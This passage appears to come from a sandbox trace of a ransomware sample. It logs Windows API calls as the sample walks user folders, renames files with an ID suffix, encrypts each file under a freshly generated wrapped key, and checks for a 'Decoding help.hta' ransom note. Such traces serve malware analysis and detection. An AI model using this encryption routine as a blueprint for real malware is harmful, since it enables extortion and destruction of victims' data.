(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uZ8yb2pzJzSAO1.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uz8yb2pzjzsao1.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uZ8yb2pzJzSAO1.mp4.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uz8yb2pzjzsao1.mp4.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uZ8yb2pzJzSAO1.mp4.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uz8yb2pzjzsao1.mp4.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6d8 [0046.610] CreateFileMappingA (hFile=0x6d8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6ec [0046.610] CryptAcquireContextA (in: phProv=0x17cdfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x17cdfcec*=0x3448f18) returned 1 [0046.611] CryptGenKey (in: hProv=0x3448f18, Algid=0x6610, dwFlags=0x1, phKey=0x17cdfce8 | out: phKey=0x17cdfce8*=0x5da5f8) returned 1 [0046.611] CryptExportKey (in: hKey=0x5da5f8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x17cdfbe4, pdwDataLen=0x17cdfce4 | out: pbData=0x17cdfbe4*, pdwDataLen=0x17cdfce4*=0x2c) returned 1 [0046.611] MapViewOfFile (hFileMappingObject=0x6ec, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x66a0) returned 0x530000 [0046.613] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x17cdfbe4*, pdwDataLen=0x17cdfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x17cdfbe4*, pdwDataLen=0x17cdfcf8*=0x100) returned 1 [0046.613] CryptEncrypt (in: hKey=0x5da5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x530000*, pdwDataLen=0x17cdfce4*=0x66a0, dwBufLen=0x66a0 | out: pbData=0x530000*, pdwDataLen=0x17cdfce4*=0x66a0) returned 1 [0046.613] UnmapViewOfFile (lpBaseAddress=0x530000) returned 1 [0046.615] CloseHandle (hObject=0x6ec) returned 1 [0046.615] CryptDestroyKey (hKey=0x5da5f8) returned 1 [0046.615] CryptReleaseContext (hProv=0x3448f18, dwFlags=0x0) returned 1 [0046.615] SetFilePointerEx (in: hFile=0x6d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.615] WriteFile (in: hFile=0x6d8, lpBuffer=0x17cdfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x17cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x17cdfbe4*, lpNumberOfBytesWritten=0x17cdfcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.616] WriteFile (in: hFile=0x6d8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x17cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x17cdfcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.616] CloseHandle (hObject=0x6d8) returned 1 [0046.617] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uZ8yb2pzJzSAO1.mp4.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.617] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x17cdfd30 | out: lpFindFileData=0x17cdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f9f1270, ftCreationTime.dwHighDateTime=0x1d4d570, ftLastAccessTime.dwLowDateTime=0xb4d590a0, ftLastAccessTime.dwHighDateTime=0x1d4cda5, ftLastWriteTime.dwLowDateTime=0xb4d590a0, ftLastWriteTime.dwHighDateTime=0x1d4cda5, nFileSizeHigh=0x0, nFileSizeLow=0x61f5, dwReserved0=0x0, dwReserved1=0x0, cFileName="VQQ6Kzula.avi", cAlternateFileName="VQQ6KZ~1.AVI")) returned 1 [0046.617] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0046.617] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned 44 [0046.617] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta" [0046.617] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\decoding help.hta")) returned 0x1 [0046.617] lstrcmpiW (lpString1="Decoding help.hta", lpString2="VQQ6Kzula.avi") returned -1 [0046.617] lstrlenW (lpString="VQQ6Kzula.avi") returned 13 [0046.617] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0046.617] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned 44 [0046.617] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="VQQ6Kzula.avi" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VQQ6Kzula.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VQQ6Kzula.avi" [0046.617] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VQQ6Kzula.avi" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VQQ6Kzula.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VQQ6Kzula.avi" [0046.617] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VQQ6Kzula.avi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VQQ6Kzula.avi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VQQ6Kzula.avi.[ID]g9uZrLhJaygpwRm1[ID]" [0046.617] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VQQ6Kzula.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vqq6kzula.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VQQ6Kzula.avi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vqq6kzula.avi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VQQ6Kzula.avi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vqq6kzula.avi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6d8 [0046.618] CreateFileMappingA (hFile=0x6d8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6ec [0046.618] CryptAcquireContextA (in: phProv=0x17cdfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x17cdfcec*=0x3448f18) returned 1 [0046.619] CryptGenKey (in: hProv=0x3448f18, Algid=0x6610, dwFlags=0x1, phKey=0x17cdfce8 | out: phKey=0x17cdfce8*=0x5da638) returned 1 [0046.619] CryptExportKey (in: hKey=0x5da638, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x17cdfbe4, pdwDataLen=0x17cdfce4 | out: pbData=0x17cdfbe4*, pdwDataLen=0x17cdfce4*=0x2c) returned 1 [0046.619] MapViewOfFile (hFileMappingObject=0x6ec, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x61e0) returned 0x530000 [0046.621] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x17cdfbe4*, pdwDataLen=0x17cdfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x17cdfbe4*, pdwDataLen=0x17cdfcf8*=0x100) returned 1 [0046.621] CryptEncrypt (in: hKey=0x5da638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x530000*, pdwDataLen=0x17cdfce4*=0x61e0, dwBufLen=0x61e0 | out: pbData=0x530000*, pdwDataLen=0x17cdfce4*=0x61e0) returned 1 [0046.621] UnmapViewOfFile (lpBaseAddress=0x530000) returned 1 [0046.623] CloseHandle (hObject=0x6ec) returned 1 [0046.623] CryptDestroyKey (hKey=0x5da638) returned 1 [0046.623] CryptReleaseContext (hProv=0x3448f18, dwFlags=0x0) returned 1 [0046.623] SetFilePointerEx (in: hFile=0x6d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.623] WriteFile (in: hFile=0x6d8, lpBuffer=0x17cdfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x17cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x17cdfbe4*, lpNumberOfBytesWritten=0x17cdfcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.624] WriteFile (in: hFile=0x6d8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x17cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x17cdfcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.624] CloseHandle (hObject=0x6d8) returned 1 [0046.624] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VQQ6Kzula.avi.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.625] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x17cdfd30 | out: lpFindFileData=0x17cdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd30cb40, ftCreationTime.dwHighDateTime=0x1d4d36b, ftLastAccessTime.dwLowDateTime=0x1abfb200, ftLastAccessTime.dwHighDateTime=0x1d4cc44, ftLastWriteTime.dwLowDateTime=0x1abfb200, ftLastWriteTime.dwHighDateTime=0x1d4cc44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vuts0ef5ZXCFIZEqf3N", cAlternateFileName="VUTS0E~1")) returned 1 [0046.625] lstrcmpW (lpString1=".", lpString2="Vuts0ef5ZXCFIZEqf3N") returned -1 [0046.625] lstrcmpW (lpString1="..", lpString2="Vuts0ef5ZXCFIZEqf3N") returned -1 [0046.625] lstrcmpiW (lpString1="windows", lpString2="Vuts0ef5ZXCFIZEqf3N") returned 1 [0046.627] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0046.627] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned 44 [0046.627] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="Vuts0ef5ZXCFIZEqf3N" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N" [0046.627] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\*.*" [0046.627] GlobalMemoryStatus (in: lpBuffer=0x17cdfd10 | out: lpBuffer=0x17cdfd10) [0046.627] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24578f90, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6d8 [0046.661] CloseHandle (hObject=0x6d8) returned 1 [0046.661] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x17cdfd30 | out: lpFindFileData=0x17cdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55ed6510, ftCreationTime.dwHighDateTime=0x1d4c7e0, ftLastAccessTime.dwLowDateTime=0x5b68b470, ftLastAccessTime.dwHighDateTime=0x1d4cdaa, ftLastWriteTime.dwLowDateTime=0x5b68b470, ftLastWriteTime.dwHighDateTime=0x1d4cdaa, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0x0, dwReserved1=0x0, cFileName="w-u--0v1t59p.avi", cAlternateFileName="W-U--0~1.AVI")) returned 1 [0046.661] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0046.661] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned 44 [0046.661] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta" [0046.661] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\decoding help.hta")) returned 0x1 [0046.661] lstrcmpiW (lpString1="Decoding help.hta", lpString2="w-u--0v1t59p.avi") returned -1 [0046.661] lstrlenW (lpString="w-u--0v1t59p.avi") returned 16 [0046.662] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0046.662] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned 44 [0046.662] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="w-u--0v1t59p.avi" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\w-u--0v1t59p.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\w-u--0v1t59p.avi" [0046.662] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\w-u--0v1t59p.avi" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\w-u--0v1t59p.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\w-u--0v1t59p.avi" [0046.662] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\w-u--0v1t59p.avi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\w-u--0v1t59p.avi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\w-u--0v1t59p.avi.[ID]g9uZrLhJaygpwRm1[ID]" [0046.662] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\w-u--0v1t59p.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\w-u--0v1t59p.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\w-u--0v1t59p.avi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\w-u--0v1t59p.avi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\w-u--0v1t59p.avi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\w-u--0v1t59p.avi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6d8 [0046.662] CreateFileMappingA (hFile=0x6d8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6a8 [0046.662] CryptAcquireContextA (in: phProv=0x17cdfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x17cdfcec*=0x3448be8) returned 1 [0046.663] CryptGenKey (in: hProv=0x3448be8, Algid=0x6610, dwFlags=0x1, phKey=0x17cdfce8 | out: phKey=0x17cdfce8*=0x6716f0) returned 1 [0046.663] CryptExportKey (in: hKey=0x6716f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x17cdfbe4, pdwDataLen=0x17cdfce4 | out: pbData=0x17cdfbe4*, pdwDataLen=0x17cdfce4*=0x2c) returned 1 [0046.663] MapViewOfFile (hFileMappingObject=0x6a8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4120) returned 0x530000 [0046.665] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x17cdfbe4*, pdwDataLen=0x17cdfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x17cdfbe4*, pdwDataLen=0x17cdfcf8*=0x100) returned 1 [0046.665] CryptEncrypt (in: hKey=0x6716f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x530000*, pdwDataLen=0x17cdfce4*=0x4120, dwBufLen=0x4120 | out: pbData=0x530000*, pdwDataLen=0x17cdfce4*=0x4120) returned 1 [0048.147] UnmapViewOfFile (lpBaseAddress=0x530000) returned 1 [0048.327] CloseHandle (hObject=0x6a8) returned 1 [0048.327] CryptDestroyKey (hKey=0x6716f0) returned 1 [0048.328] CryptReleaseContext (hProv=0x3448be8, dwFlags=0x0) returned 1 [0048.328] SetFilePointerEx (in: hFile=0x6d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.328] WriteFile (in: hFile=0x6d8, lpBuffer=0x17cdfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x17cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x17cdfbe4*, lpNumberOfBytesWritten=0x17cdfcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.380] WriteFile (in: hFile=0x6d8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x17cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x17cdfcf8*=0x500, lpOverlapped=0x0) returned 1 [0050.380] CloseHandle (hObject=0x6d8) returned 1 [0051.385] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\w-u--0v1t59p.avi.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.273] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x17cdfd30 | out: lpFindFileData=0x17cdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55ed6510, ftCreationTime.dwHighDateTime=0x1d4c7e0, ftLastAccessTime.dwLowDateTime=0x5b68b470, ftLastAccessTime.dwHighDateTime=0x1d4cdaa, ftLastWriteTime.dwLowDateTime=0x5b68b470, ftLastWriteTime.dwHighDateTime=0x1d4cdaa, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0x0, dwReserved1=0x0, cFileName="w-u--0v1t59p.avi", cAlternateFileName="W-U--0~1.AVI")) returned 0 [0055.273] FindClose (in: hFindFile=0x5d8a10 | out: hFindFile=0x5d8a10) returned 1 Thread: id = 361 os_tid = 0xa40 [0043.185] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\*.*", lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8b90 [0043.185] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.185] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.185] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.185] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.185] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java Update", cAlternateFileName="JAVAUP~1")) returned 1 [0043.185] lstrcmpW (lpString1=".", lpString2="Java Update") returned -1 [0043.185] lstrcmpW (lpString1="..", lpString2="Java Update") returned -1 [0043.185] lstrcmpiW (lpString1="windows", lpString2="Java Update") returned 1 [0043.185] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\*.*" [0043.185] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\*.*") returned 35 [0043.185] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\", lpString2="Java Update" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update") returned="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update" [0043.185] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Sun\\Java\\Java Update\\*.*" [0043.185] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0043.186] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x108984c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x534 [0043.219] CloseHandle (hObject=0x534) returned 1 [0043.219] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java Update", cAlternateFileName="JAVAUP~1")) returned 0 [0043.219] FindClose (in: hFindFile=0x5d8b90 | out: hFindFile=0x5d8b90) returned 1 Thread: id = 362 os_tid = 0x9fc [0043.220] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\*.*", lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8b90 [0043.220] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.220] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.221] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.221] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.221] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x77, dwReserved0=0x0, 